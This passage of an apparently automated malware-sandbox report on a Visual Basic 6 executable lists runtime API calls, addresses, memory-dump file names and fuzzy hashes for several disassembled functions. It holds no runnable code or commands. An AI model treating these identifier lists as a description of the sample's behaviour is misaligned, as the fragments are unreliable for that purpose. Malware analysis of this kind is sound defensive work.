                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$CheckFreeHresult$CallCastChkstkErrorLateList
                                                                                    • String ID: [
                                                                                    • API String ID: 269068952-784033777
                                                                                    • Opcode ID: 5016deb1a59da2f2e0196918561fb49243e5c565f0178785edbf7654f715f660
                                                                                    • Instruction ID: 16c54425a3ce120e5e2135e3149755cc9251ea993a7cd341aaf2995901e8571e
                                                                                    • Opcode Fuzzy Hash: 5016deb1a59da2f2e0196918561fb49243e5c565f0178785edbf7654f715f660
                                                                                    • Instruction Fuzzy Hash: 61512A75900608EBDB10DFA4D948BDEBBB4FF08704F20825DF515AB291D7799A84CFA8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaAryLock.MSVBVM60(00000000,?), ref: 00419650
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00419688
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004196A2
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 004196C9
                                                                                    • __vbaAryUnlock.MSVBVM60(00000000), ref: 004196D3
                                                                                    • __vbaStrComp.MSVBVM60(00000001,00000000,?), ref: 004196E5
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004196FA
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00419745
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0041975F
                                                                                    • __vbaCopyBytes.MSVBVM60(00000010,00000000,?), ref: 0041977E
                                                                                    • __vbaErase.MSVBVM60(00000000,?), ref: 004197AC
                                                                                    • __vbaErase.MSVBVM60(00000000,?), ref: 004197BF
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,00419803), ref: 004197F0
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004197FC
                                                                                    • __vbaErrorOverflow.MSVBVM60 ref: 0041981A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$BoundsGenerate$DestructErase$BytesCompCopyFreeLockMoveOverflowUnlock
                                                                                    • String ID:
                                                                                    • API String ID: 2458773320-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,004032B6,00000000), ref: 004295F7
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,?,?,?,?,?,?,004032B6,00000000), ref: 00429604
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004032B6,00000000), ref: 00429611
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?), ref: 0042961E
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?), ref: 00429629
                                                                                    • __vbaStrToUnicode.MSVBVM60(00000000,?,?,00000000,?,00000000,?,00000000), ref: 0042963D
                                                                                    • __vbaStrToUnicode.MSVBVM60(004032B6,?,?,00000000,?,00000000,?,00000000), ref: 00429647
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,?,00000000,?,00000000,?,00000000), ref: 0042964E
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,?,00000000,?,00000000,?,00000000), ref: 00429655
                                                                                    • __vbaI2I4.MSVBVM60(?,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004032B6), ref: 0042965A
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000000,?,00000000,?,00000000), ref: 00429675
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$AnsiUnicode$ErrorFreeListSystem
                                                                                    • String ID:
                                                                                    • API String ID: 3859701107-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(?,Function_000032B6), ref: 0040DABE
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,Function_000032B6), ref: 0040DB05
                                                                                    • __vbaStrCat.MSVBVM60( RU,00000000,?,?,?,?,Function_000032B6), ref: 0040DB1E
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,Function_000032B6), ref: 0040DB29
                                                                                      • Part of subcall function 0042A090: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,0040CA73,80000002,00000000), ref: 0042A0AE
                                                                                      • Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0DB
                                                                                      • Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0E7
                                                                                      • Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0F3
                                                                                      • Part of subcall function 0042A090: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042A102
                                                                                      • Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 0042A11B
                                                                                      • Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,00000000,004032B6), ref: 0042A12B
                                                                                      • Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A139
                                                                                      • Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A142
                                                                                      • Part of subcall function 0042A090: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 0042A153
                                                                                      • Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,00000000,004032B6), ref: 0042A162
                                                                                      • Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(00000001,?,00000000,00000001,00000000,?,?,?,00000000,004032B6), ref: 0042A175
                                                                                      • Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004032B6), ref: 0042A185
                                                                                      • Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A193
                                                                                      • Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A1A1
                                                                                      • Part of subcall function 0042A090: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,00000000,004032B6), ref: 0042A1B1
                                                                                      • Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(?,?,00000000,004032B6), ref: 0042A1CA
                                                                                      • Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(0042A207,?,00000000,004032B6), ref: 0042A1EE
                                                                                      • Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(?,00000000,004032B6), ref: 0042A1F7
                                                                                    • __vbaFreeStr.MSVBVM60(80000002,00000000,00000000,00000000,?,?,?,?,Function_000032B6), ref: 0040DB4A
                                                                                    • __vbaStrCat.MSVBVM60( RU,00000000,?,?,?,?,Function_000032B6), ref: 0040DB63
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,Function_000032B6), ref: 0040DB6E
                                                                                    • __vbaFreeStr.MSVBVM60(80000002,00000000,00000000,00000000,?,?,?,?,Function_000032B6), ref: 0040DB8F
                                                                                      • Part of subcall function 00415FD0: __vbaSetSystemError.MSVBVM60(00000000,0040DBA1,?,?,?,?,Function_000032B6), ref: 00415FE5
                                                                                      • Part of subcall function 00416100: __vbaSetSystemError.MSVBVM60(00000000,0040DBAD,?,?,?,?,Function_000032B6), ref: 00416115
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$Free$System$AnsiCopyUnicode$ChkstkMove$BstrList
                                                                                    • String ID: RU
                                                                                    • API String ID: 279242310-1417676127
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(?,Function_000032B6), ref: 0042908E
                                                                                    • __vbaObjSetAddref.MSVBVM60(?,00000000,?,?,?,?,Function_000032B6), ref: 004290D4
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,Function_000032B6), ref: 004290E3
                                                                                    • __vbaVarVargNofree.MSVBVM60(?,?,?,?,Function_000032B6), ref: 004290F6
                                                                                    • __vbaStrErrVarCopy.MSVBVM60(00000000,?,?,?,?,Function_000032B6), ref: 004290FD
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,Function_000032B6), ref: 00429108
                                                                                    • __vbaChkstk.MSVBVM60 ref: 00429120
                                                                                    • __vbaRaiseEvent.MSVBVM60(?,00000001,00000001), ref: 00429146
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,Function_000032B6), ref: 00429152
                                                                                    • __vbaFreeObj.MSVBVM60(0042917A,?,?,?,?,?,?,Function_000032B6), ref: 00429173
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$ChkstkFree$AddrefCopyErrorEventMoveNofreeRaiseVarg
                                                                                    • String ID:
                                                                                    • API String ID: 3705209087-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaVarSetObjAddref.MSVBVM60(?,00000000), ref: 0041D5D9
                                                                                    • __vbaVarSetObjAddref.MSVBVM60(?,00000000), ref: 0041D5E1
                                                                                    • __vbaVarSetObjAddref.MSVBVM60(?,00000000), ref: 0041D5E9
                                                                                    • __vbaExitProc.MSVBVM60 ref: 0041D5EB
                                                                                    • __vbaFreeVar.MSVBVM60(0041D664), ref: 0041D64B
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 0041D650
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041D658
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 0041D661
                                                                                    • __vbaErrorOverflow.MSVBVM60 ref: 0041D680
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$AddrefFree$DestructErrorExitOverflowProc
                                                                                    • String ID:
                                                                                    • API String ID: 2473607959-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaOnError.MSVBVM60(00000001,?,00402F88,?,?,?,?,?,00000000,004032B6), ref: 00428CF6
                                                                                    • __vbaExitProc.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00428D27
                                                                                    • __vbaErrorOverflow.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00428D42
                                                                                    • __vbaOnError.MSVBVM60(00000001), ref: 00428D95
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A214,000007BC), ref: 00428DBA
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A184,00000094), ref: 00428DE4
                                                                                    • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 00428DF3
                                                                                    • __vbaExitProc.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 00428DF9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$CheckExitHresultProc$FreeOverflow
                                                                                    • String ID:
                                                                                    • API String ID: 1609803294-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaOnError.MSVBVM60(00000001), ref: 0040D56C
                                                                                    • __vbaNew2.MSVBVM60(00406520,0042CC34), ref: 0040D584
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D5A7
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004082BC,00000040), ref: 0040D5CB
                                                                                    • __vbaObjSet.MSVBVM60(?,?), ref: 0040D5E2
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406510,0000000C), ref: 0040D5F8
                                                                                    • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040D608
                                                                                    • __vbaExitProc.MSVBVM60 ref: 0040D611
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$CheckHresult$ErrorExitFreeListNew2Proc
                                                                                    • String ID:
                                                                                    • API String ID: 306309671-0
                                                                                    • Opcode ID: ca2ad210dbadf10d8339a2c6302259c2d85a358f52ad595904c40038edc4eebe
                                                                                    • Instruction ID: d803e8ae1a74f1de2285c6eb7d8813a05e13e9447d060414ac64bef4c706b468
                                                                                    • Opcode Fuzzy Hash: ca2ad210dbadf10d8339a2c6302259c2d85a358f52ad595904c40038edc4eebe
                                                                                    • Instruction Fuzzy Hash: CB318E70900218FFDB10DF95DD89E9EBBB8FF08B04F10456AF545B7290D77899448BA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • _adj_fdiv_m64.MSVBVM60(660E6C4A,00000000), ref: 0042510E
                                                                                    • __vbaR8IntI4.MSVBVM60(x.@,660E6C4A,00000000), ref: 00425122
                                                                                    • _adj_fdiv_m64.MSVBVM60 ref: 00425167
                                                                                    • __vbaR8IntI4.MSVBVM60 ref: 00425172
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba_adj_fdiv_m64
                                                                                    • String ID: x.@
                                                                                    • API String ID: 2746309926-3631786054
                                                                                    • Opcode ID: 9ac73b9d7d80b49c2d232aa197a81b06f8acdeec819939354fa6ae610ae96cf9
                                                                                    • Instruction ID: e2d31677cc0c5545fa80c966f8e09b0dd77fe682f18f487efa9605fdaabcacac
                                                                                    • Opcode Fuzzy Hash: 9ac73b9d7d80b49c2d232aa197a81b06f8acdeec819939354fa6ae610ae96cf9
                                                                                    • Instruction Fuzzy Hash: CD216831B046119FD7099F14FA4433BBBA6B7C8341F55867EE485D22A4CB788895C749
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaOnError.MSVBVM60(00000001,?,?,?,?,?,?,?,?,Function_000032B6), ref: 004291EA
                                                                                    • __vbaCastObj.MSVBVM60(00000000,0040A2F8,?,?,?,?,?,?,?,?,Function_000032B6), ref: 004291F8
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,Function_000032B6), ref: 00429203
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A214,000007C4,?,?,?,?,?,?,?,?,Function_000032B6), ref: 00429223
                                                                                    • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,Function_000032B6), ref: 0042922C
                                                                                    • __vbaRaiseEvent.MSVBVM60(?,00000002,00000000,?,?,?,?,?,?,?,?,Function_000032B6), ref: 00429236
                                                                                    • __vbaExitProc.MSVBVM60(?,?,?,?,?,?,?,?,Function_000032B6), ref: 0042923F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$CastCheckErrorEventExitFreeHresultProcRaise
                                                                                    • String ID:
                                                                                    • API String ID: 2392155486-0
                                                                                    • Opcode ID: 039d90c4dc18c79ec7187133a193b3ab27d0cecebb805d049768fa3ec49b57b7
                                                                                    • Instruction ID: 083221939679d71a8f0af14ea155fa08f788ddfb085ab1f4567514e6edbf7ed0
                                                                                    • Opcode Fuzzy Hash: 039d90c4dc18c79ec7187133a193b3ab27d0cecebb805d049768fa3ec49b57b7
                                                                                    • Instruction Fuzzy Hash: 64119A71940654BBCB00AFA4CE49E9EBBB8FF48B00F10806AF841B22A1C77815408BF9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaExitProc.MSVBVM60 ref: 00428BBE
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,00428C0D), ref: 00428BE2
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00428BEA
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00428BF2
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00428BFA
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00428C02
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00428C0A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Destruct$ExitProc
                                                                                    • String ID:
                                                                                    • API String ID: 1594393734-0
                                                                                    • Opcode ID: 952738d25d21216cb59d4962ff70e805ce52a3947e489f7afe1132f397de7233
                                                                                    • Instruction ID: 9365795d6c175bddc2ceeb307a93c3593e60e9969e1da01e8ce20a231f89a0e7
                                                                                    • Opcode Fuzzy Hash: 952738d25d21216cb59d4962ff70e805ce52a3947e489f7afe1132f397de7233
                                                                                    • Instruction Fuzzy Hash: 9BE0ACB29441286AEB4097D0EC41FBD7B3CEB84701F44411AF606AA0989AA42A44CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaSetSystemError.MSVBVM60(660E6C30,660E6A76,00000000), ref: 00415F0F
                                                                                    • __vbaNew2.MSVBVM60(00406520,0042CC34,660E6C30,660E6A76,00000000), ref: 00415F27
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406510,00000014), ref: 00415F4C
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406530,00000100), ref: 00415F76
                                                                                    • __vbaSetSystemError.MSVBVM60(0000000D,00416130,?,00000000), ref: 00415F8F
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 00415F9E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$CheckErrorHresultSystem$FreeNew2
                                                                                    • String ID:
                                                                                    • API String ID: 4095944179-0
                                                                                    • Opcode ID: 0e2877956f964c667186ba7d453f48a1745dc0f6204dd302438443de716a423e
                                                                                    • Instruction ID: 86e52eac19165ff6a91ac7dd53a600c53f32cd3851e5c07b860265a300e2eb8b
                                                                                    • Opcode Fuzzy Hash: 0e2877956f964c667186ba7d453f48a1745dc0f6204dd302438443de716a423e
                                                                                    • Instruction Fuzzy Hash: AA218674A00645EBCB20DBA4EE89FDEBB74EB58741F50012AF145B31E0D77859428BA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,0041A8A0,?,?,00000000,Function_000032B6), ref: 0041A4BE
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041A4EE
                                                                                      • Part of subcall function 0041A2B0: __vbaChkstk.MSVBVM60(00000000,Function_000032B6,0041A500,?,?,?,00000000,Function_000032B6), ref: 0041A2CE
                                                                                      • Part of subcall function 0041A2B0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6,0041A500), ref: 0041A2FE
                                                                                      • Part of subcall function 0041A2B0: __vbaSetSystemError.MSVBVM60(?,?,?,00000000,Function_000032B6,0041A500), ref: 0041A313
                                                                                      • Part of subcall function 0041A2B0: __vbaSetSystemError.MSVBVM60(?,00000028,?,?,?,?,00000000,Function_000032B6,0041A500), ref: 0041A32B
                                                                                      • Part of subcall function 0041A2B0: __vbaSetSystemError.MSVBVM60(?,00000000,?,0000001C,?,0000001C), ref: 0041A37B
                                                                                      • Part of subcall function 0041A2B0: __vbaSetSystemError.MSVBVM60(?), ref: 0041A475
                                                                                    • __vbaSetSystemError.MSVBVM60(001F0FFF,00000000,?,?,?,?,00000000,Function_000032B6), ref: 0041A51C
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,?,00000000,Function_000032B6), ref: 0041A53C
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,?,00000000,Function_000032B6), ref: 0041A559
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 0041A575
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$System$Chkstk
                                                                                    • String ID:
                                                                                    • API String ID: 1207130036-0
                                                                                    • Opcode ID: 5bb2bcfdb485b1fc5dace36e1ee00ee028e08319f0daf42fe37a24dbea0d6490
                                                                                    • Instruction ID: 0ffcf597171400e777aa296a20f0d346976af0d8bd5363bbaeaa7b020b9ff71b
                                                                                    • Opcode Fuzzy Hash: 5bb2bcfdb485b1fc5dace36e1ee00ee028e08319f0daf42fe37a24dbea0d6490
                                                                                    • Instruction Fuzzy Hash: 5821D8B5D00648EBDB00EFE5DA49BDEBBB4FB48714F108269E500B7390C7795A44CBA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaOnError.MSVBVM60(00000001,?,?,?,?,?,?,?,?,Function_000032B6), ref: 004292BF
